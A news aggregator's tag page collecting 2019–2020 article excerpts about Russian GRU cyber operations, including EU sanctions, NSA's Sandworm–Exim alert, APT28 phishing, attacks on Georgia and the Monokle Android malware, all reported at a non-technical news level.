GRU – Page 4 – WindowsTechs.com

EU sanctions Russian intelligence, Chinese nationals and a North Korean front company for alleged hacks

Posted on July 30, 2020 by Jeff Stone

The European Union has sanctioned six people and three organizations in Russia, China and North Korea in connection with three major cyberattacks dating back to 2017. EU officials announced Thursday they would enact restrictive measures against the people it deemed responsible for the WannaCry ransomware outbreak in 2017, the NotPetya campaign and Operation Cloud Hopper, a Chinese cyber-espionage effort. Penalties include a travel ban, asset freeze and prohibit people and organizations in the EU from “making funds available” to the sanctioned individuals and entities. The move follows previous U.S. allegations against many of the same parties. “Sanctions are one of the options available in the EU’s cyber diplomacy toolbox to prevent, deter and respond to malicious cyber activities directed against the EU or its member states, and today is the first time the EU has used this tool,” officials said in a statement. The sanctions name unit 74455 of Russia’s […]

The post EU sanctions Russian intelligence, Chinese nationals and a North Korean front company for alleged hacks appeared first on CyberScoop.

Continue reading EU sanctions Russian intelligence, Chinese nationals and a North Korean front company for alleged hacks→

NSA: Russia Hacking U.S. Firms, via Old Exim Flaw

Posted on May 29, 2020 by Richi Jennings

The Russian state is breaking into companies, exploiting a vulnerability in an open-source email server.
The post NSA: Russia Hacking U.S. Firms, via Old Exim Flaw appeared first on Security Boulevard.
Continue reading NSA: Russia Hacking U.S. Firms, via Old Exim Flaw→

NSA calls out Russian military hackers targeting mail relay software

Posted on May 28, 2020 by Shannon Vavra

Hackers working for Russia’s intelligence agency have been exploiting a vulnerability in a mail relay software since August of last year, according to an alert issued Thursday by by the National Security Agency. The NSA publicly attributes the actions to the Russian military’s Main Center for Special Technologies (GTsST). That group is more commonly known as Sandworm, the hacking group believed to be responsible for Ukraine grid disruptions. The alert comes amid a broader agency effort to publicly share more unclassified threat intelligence. The NSA established a cybersecurity directorate last year to take the reins on providing real-time information in the hopes to prevent digital intrusions against U.S. networks. The Exim Mail Transfer Agent (MTA) vulnerability exploited in this case, CVE-2019-10149, allows the threat actors to execute commands and code remotely. When Sandworm exploits the vulnerability, victim machines download and execute a shell script from a Sandworm-controlled domain, according to […]

The post NSA calls out Russian military hackers targeting mail relay software appeared first on CyberScoop.

Continue reading NSA calls out Russian military hackers targeting mail relay software→

Russian hackers using stolen corporate email accounts to mask their phishing attempts

Posted on March 19, 2020 by Shannon Vavra

Hackers working for Russian military intelligence have long relied on zero-days and malware to target their victims, but in the last year they’ve kept it simple — using previously hacked email accounts to send a wide array of phishing attempts, according to new research from security firm Trend Micro. Since at least May of last year, the group known as Fancy Bear, APT28, or Pawn Storm, has used hacked email accounts belonging to high-profile personnel working at defense firms in the Middle East to carry out the operation, according to Feike Hacquebord, a senior threat researcher at Trend Micro. “The actor connects to a dedicated server using the OpenVPN option of a commercial VPN provider and then uses compromised email credentials to send out credential spam via a commercial email service provider,” Hacquebord writes in the research. The group, which the U.S. Department of Justice linked with Russia’s Main Intelligence Directorate […]

The post Russian hackers using stolen corporate email accounts to mask their phishing attempts appeared first on CyberScoop.

Continue reading Russian hackers using stolen corporate email accounts to mask their phishing attempts→

US and UK call out Russian hackers for Georgia attacks

Posted on February 21, 2020 by Danny Bradbury

The US and UK governments have both accused Russia of launching a cyber attack against the Georgian government last year. Continue reading US and UK call out Russian hackers for Georgia attacks→

In rare move, State Department calls out Russia for attacks on Georgia last year

Posted on February 20, 2020 by Shannon Vavra

In a rare public announcement, the State Department is formally blaming Russian intelligence for a cyber incident that disrupted thousands of websites in Georgia last year. The incident, carried out by the Russian General Staff Main Intelligence Directorate (GRU) last October, according to Secretary of State Mike Pompeo, disrupted and defaced thousands of Georgian government websites and the broadcast of two television stations. “This action contradicts Russia’s attempts to claim it is a responsible actor in cyberspace and demonstrates a continuing pattern of reckless Russian GRU cyber operations against a number of countries,” Pompeo said in a statement Thursday. “These operations aim to sow division, create insecurity, and undermine democratic institutions.” Thursday’s announcement was the first time the U.S. government connected the GRU to the hacking group known as Sandworm. The U.S. government has previously said Sandworm was responsible for the NotPetya worm and Olympic Destroyer attacks. The rare reprimand […]

The post In rare move, State Department calls out Russia for attacks on Georgia last year appeared first on CyberScoop.

Continue reading In rare move, State Department calls out Russia for attacks on Georgia last year→

The latest in Facebook’s dragnet: Propaganda from Russian military intelligence

Posted on February 12, 2020 by Jeff Stone

Facebook on Wednesday announced the removal of three networks of accounts it had determined were operating on behalf of foreign governments, including a number of pages that the company tied to Russian intelligence services. Researchers found a network of 78 accounts, 11 Pages, 29 groups and four Instagram pages that often posted about news such as Russia’s involvement in Syria and the downing of the Malaysian airliner MH17 and also had links to Russian military intelligence services, the company said. Sometimes, the account holders misrepresented themselves as citizen journalists, and contacted policymakers, reporters and other known figures in the region who could help amplify their content, Facebook said in a blog post. The other networks originated in Iran, where operators also impersonated journalists, and Vietnam and Myanmar, where the Burmese telecommunications company MyTel, which is indirectly owned by the Burmese and Vietnamese militaries, engaged in “coordinated inauthentic behavior.” These takedowns are […]

The post The latest in Facebook’s dragnet: Propaganda from Russian military intelligence appeared first on CyberScoop.

Continue reading The latest in Facebook’s dragnet: Propaganda from Russian military intelligence→

Americans still vulnerable to hack-and-leak tactics, DOJ official says

Posted on January 17, 2020 by Sean Lyngaas

As the 2020 election campaigning kicks into high gear, a senior Department of Justice official says he worries that Americans are still vulnerable to foreign hack-and-leak operations that are intended to disrupt democratic processes. “One of the things that I am concerned about is the hacking-and-dumping activity that occurred in 2016,” John Demers, the assistant attorney general for national security, said Friday. He was referring to Russian military officers’ hacking of email servers used by Democratic political organizations, and the selective leaking of those emails to the public. Despite a lot of progress on election security since Russian interference in 2016, the personal email accounts used by political campaigns are still a weak link, Demers said at the Wilson Center in Washington, D.C. “It really is dependent on their cyber hygiene practices…and not clicking on that wrong email,” Demers said. “What the Russians did in 2016 in terms of the […]

The post Americans still vulnerable to hack-and-leak tactics, DOJ official says appeared first on CyberScoop.

Continue reading Americans still vulnerable to hack-and-leak tactics, DOJ official says→

Russia’s GRU propped up fake media personas, mostly failed at social media promotion after DNC hack

Posted on November 13, 2019 by Jeff Stone

Russian military hackers who stole emails from the Democratic National Committee in 2016 were only acting as one part of a larger, coordinated effort to spread Kremlin-approved messaging before and after the 2016 election, according to new findings from Stanford University. Stanford’s Internet Observatory on Tuesday released a trove of analysis detailing how the GRU, a Russian military intelligence unit, was unable to generate public interest in the data stolen from Hillary Clinton’s campaign for more than a month. Hackers first linked to the stolen emails in a June 14, 2016 set of Facebook posts, pointing to a set of messages supposedly leaked from the campaign. Facebook engagement to the DC Leaks Page, later attributed to Russia, totaled a mere 834 engagements over 22 posts published over four months. International attention only began when WikiLeaks tweeted a link to a database containing thousands of documents revealing internal strife in the […]

The post Russia’s GRU propped up fake media personas, mostly failed at social media promotion after DNC hack appeared first on CyberScoop.

Continue reading Russia’s GRU propped up fake media personas, mostly failed at social media promotion after DNC hack→

A Russian military contractor has a new, shady Android malware kit

Posted on July 24, 2019 by Sean Lyngaas

A contractor for the Russian military that was sanctioned for interfering in the 2016 U.S. election has developed Android malware that is being used in “highly-targeted” attacks that exfiltrate data using third-party applications, according to mobile security company Lookout. The malware allegedly developed by the contractor, St. Petersburg-based Special Technology Center (STC), is capable of installing the attacker’s own software certificate in a certificate store and then using it for “man-in-the-middle” attacks, intercepting data before it reaches its intended recipient. “This ability is something that Lookout researchers have never seen in the wild before,” Lookout’s Adam Bauer, Apurva Kumar, Christoph Hebeisen said Wednesday. The so-called “Monokle” malware is extremely invasive, according to Lookout. It can record a target device’s screen while the user is unlocking it, capturing the user’s PIN. It abuses Android’s accessibility features to harvest data from third-party apps. And it uses “predictive-text dictionaries” to figure out what a […]

The post A Russian military contractor has a new, shady Android malware kit appeared first on CyberScoop.

Continue reading A Russian military contractor has a new, shady Android malware kit→